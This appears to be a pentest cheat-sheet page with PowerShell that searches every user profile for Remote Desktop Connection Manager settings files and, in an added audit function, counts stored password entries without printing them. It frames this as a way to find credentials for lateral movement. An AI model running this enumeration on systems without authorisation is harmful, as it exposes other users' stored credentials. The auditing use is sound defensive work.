Checking Remote Desktop Connection Manager

Sometimes the Remote Desktop Connection Manager settings file contains stored credentials, which can be used for privilege escalation or lateral movement.

Checking for the Presence of RDCMan

Get-ChildItem -Path 'C:\Users' -Directory | ForEach-Object {
    $userPath = $_.FullName
    $rdcPath = Join-Path -Path $userPath -ChildPath 'AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings'
    Write-Host "----------------------------------------" -ForegroundColor Cyan
    Write-Host "Checking for user: $($_.Name)" -ForegroundColor Blue
    if (Test-Path $rdcPath) {
        Write-Host "RDCMan Settings Found for user: $($_.Name)" -ForegroundColor Green
        Write-Host "Path: $rdcPath" -ForegroundColor Yellow
    } else {
        Write-Host "No RDCMan.Settings found for user: $($_.Name)" -ForegroundColor Red
    }
    Write-Host "----------------------------------------" -ForegroundColor Cyan
}

One Liner:

Get-ChildItem -Path 'C:\Users' -Directory | ForEach-Object { $userPath = $_.FullName; $rdcPath = Join-Path -Path $userPath -ChildPath 'AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings'; Write-Host "----------------------------------------" -ForegroundColor Cyan; Write-Host "Checking for user: $($_.Name)" -ForegroundColor Blue; if (Test-Path $rdcPath) { Write-Host "RDCMan Settings Found for user: $($_.Name)" -ForegroundColor Green; Write-Host "Path: $rdcPath" -ForegroundColor Yellow } else { Write-Host "No RDCMan.Settings found for user: $($_.Name)" -ForegroundColor Red }; Write-Host "----------------------------------------" -ForegroundColor Cyan }

If Found

If the file is found, review it for sensitive information such as stored credentials.
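
An added example (not from the original page) that extends the presence check into an audit: it reports which RDCMan files hold non-empty stored password entries, without printing the values. The function name Get-RdcManStoredCredential and the element names FilesToOpen/item and password are assumptions about the RDCMan file layout.

```powershell
# Added audit example. Assumed RDCMan layout: RDCMan.settings lists connection
# files under <FilesToOpen><item>, and stored secrets sit in <password> elements.
function Get-RdcManStoredCredential {
    param([string]$UsersRoot = 'C:\Users')

    $relative = 'AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings'
    foreach ($userDir in Get-ChildItem -LiteralPath $UsersRoot -Directory -ErrorAction SilentlyContinue) {
        $settings = Join-Path -Path $userDir.FullName -ChildPath $relative
        if (-not (Test-Path -LiteralPath $settings -PathType Leaf)) { continue }

        # Audit the settings file itself plus every connection file it references.
        $files = @($settings)
        try {
            [xml]$doc = Get-Content -LiteralPath $settings -Raw -ErrorAction Stop
            $files += @($doc.SelectNodes('//FilesToOpen/item') | ForEach-Object { $_.InnerText })
        } catch {
            Write-Warning "Cannot parse $settings : $($_.Exception.Message)"
        }

        foreach ($file in ($files | Select-Object -Unique)) {
            if (-not (Test-Path -LiteralPath $file -PathType Leaf)) { continue }
            try {
                [xml]$xml = Get-Content -LiteralPath $file -Raw -ErrorAction Stop
            } catch {
                Write-Warning "Cannot parse $file : $($_.Exception.Message)"
                continue
            }
            # Count non-empty <password> elements; the values are never emitted.
            $stored = @($xml.SelectNodes('//password') | Where-Object { $_.InnerText.Trim() })
            [pscustomobject]@{
                User            = $userDir.Name
                File            = $file
                StoredPasswords = $stored.Count
                LastWriteTime   = (Get-Item -LiteralPath $file).LastWriteTime
            }
        }
    }
}

# Show only the files that actually carry saved password entries.
Get-RdcManStoredCredential | Where-Object StoredPasswords -gt 0 | Format-Table -AutoSize
```

Files reported with a nonzero count are the ones where saved credentials should be removed from the connection file.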
